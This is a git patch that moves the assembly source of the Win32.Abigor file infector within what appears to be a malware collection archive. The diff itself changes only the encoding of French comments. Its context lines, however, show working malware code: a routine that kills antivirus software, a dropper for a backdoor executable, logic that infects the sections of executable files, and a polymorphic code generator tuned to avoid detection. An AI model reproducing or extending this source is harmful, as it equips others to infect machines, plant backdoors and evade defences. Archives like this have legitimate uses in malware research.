From 7eaec4c565cc10f81a671e66eda8435f389eb352 Mon Sep 17 00:00:00 2001
From: vxunderground <57078196+vxunderground@users.noreply.github.com>
Date: Wed, 28 Oct 2020 23:13:34 -0500
Subject: [PATCH] Rename Win32/Win32.Abigor.ASM to
 Win32/Infector/Win32.Abigor.ASM

---
 Win32/{ => Infector}/Win32.Abigor.ASM | 18 +++++++++---------
 1 file changed, 9 insertions(+), 9 deletions(-)
 rename Win32/{ => Infector}/Win32.Abigor.ASM (96%)

diff --git a/Win32/Win32.Abigor.ASM b/Win32/Infector/Win32.Abigor.ASM
similarity index 96%
rename from Win32/Win32.Abigor.ASM
rename to Win32/Infector/Win32.Abigor.ASM
index 1f53960..517282a 100644
--- a/Win32/Win32.Abigor.ASM
+++ b/Win32/Infector/Win32.Abigor.ASM
@@ -368,7 +368,7 @@ assume fs:nothing
 
 
             
-            CAll    KillAVz                                         ; aprčs que TIME_DROP soit dépassé detruire les AVs
+            CAll    KillAVz                                         ; après que TIME_DROP soit dÊpassÊ detruire les AVs
             
             lea     eax, dword ptr [ebp + TS_Win]
             push    eax
@@ -376,7 +376,7 @@ assume fs:nothing
             lea     eax, dword ptr [ebp + szFindWindowA]
             Call    U32Api
             or      eax, eax
-            jnz     no_drop                                         ; Backdoor déjā implanté sur notre systčme ?
+            jnz     no_drop                                         ; Backdoor dÊjà implantÊ sur notre système ?
 
             
             Call    Drop_BackDoor                                   ; non ??? implantons !!
@@ -2733,7 +2733,7 @@ Backdoor  db "DABACKDOOR.EXE",0
 
             inc    byte ptr [ebp+InfectionCtr]
 
-            add    eax,dword ptr [ebp + pMap]                   ;eax pointe sur le début de la derniere section
+            add    eax,dword ptr [ebp + pMap]                   ;eax pointe sur le dÊbut de la derniere section
             add    eax,dword ptr [ebp + SizeRelative]         ;eax pointe sur la fin de la derniere section
 
             mov    edi, eax
@@ -3999,7 +3999,7 @@ Make_Random_Blk proc uses ecx ebx edx esi
                Call    Push_Pop_blk 
         .ELSEIF eax    == 11
                Call    MediumBlk  
-        .ELSEIF eax    >  12 && eax <= 16           ; (trop de détection si ce facteur est trop élevé.)
+        .ELSEIF eax    >  12 && eax <= 16           ; (trop de dÊtection si ce facteur est trop ÊlevÊ.)
                Call    Branch_blk
         .ELSEIF eax    == 17
                Call    MemAccess_blk
@@ -4579,7 +4579,7 @@ SkipDirectCMP:
         jmp    @Method2
       @Method1:
         mov    ebx,dword ptr [_LoopOFS]
-        sub    ebx,edi   ; adresse oų sauter   
+        sub    ebx,edi   ; adresse oÚ sauter   
         
        
         xor    eax,eax
@@ -4678,7 +4678,7 @@ SkipDirectCMP:
                push   ebx
                mov    edx, edi
                mov    ebx,dword ptr [_LoopOFS]
-               sub    ebx,edi   ; adresse oų sauter 
+               sub    ebx,edi   ; adresse oÚ sauter 
                CALL   GEN_JMP_OFS
                sub    edx, edi
                neg    edx 
@@ -5594,7 +5594,7 @@ ModifyKey proc uses ecx ebx edx
       
 ModifyKey endp                  
 
-;ModifyReg proc uses edx ebx     ; Modifie n'importe quel registre puis le restaure (meme un registre réservé)
+;ModifyReg proc uses edx ebx     ; Modifie n'importe quel registre puis le restaure (meme un registre rÊservÊ)
 ;      Call   Get2RandRegs
 ;      mov    ch, cl
 
@@ -6225,7 +6225,7 @@ InstrTBL          dd OFFSET GEN_ADD_REG32_IMM;---
                            
                   ;dd OFFSET GEN_ONEBYTE
                   
-                  ;dd OFFSET GEN_IMUL_REG32         ; enlevé : change la valeur de EDX
+                  ;dd OFFSET GEN_IMUL_REG32         ; enlevÊ : change la valeur de EDX
                   ;dd OFFSET GEN_MUL_REG32
 
                   dd OFFSET GEN_INC_REG8        
@@ -6242,7 +6242,7 @@ MEMSTART          equ   $
                   dd OFFSET GEN_LEA_REG32_DISP32
                                                  
                   dd OFFSET GEN_XADD_REG32_REG32
-                  dd OFFSET GEN_XCHG_REG32_REG32    ; Ne pas déplacer / do not move this one
+                  dd OFFSET GEN_XCHG_REG32_REG32    ; Ne pas dÊplacer / do not move this one
 MEMEND            equ   $                  
 MEMSTARTNBR       = (($ - OFFSET InstrTBL) / 4 ) - (( MEMEND - OFFSET MEMSTART) / 4)                                      
 TOTALNBR          = (OFFSET $ - OFFSET InstrTBL) / 4   
-- 
GitLab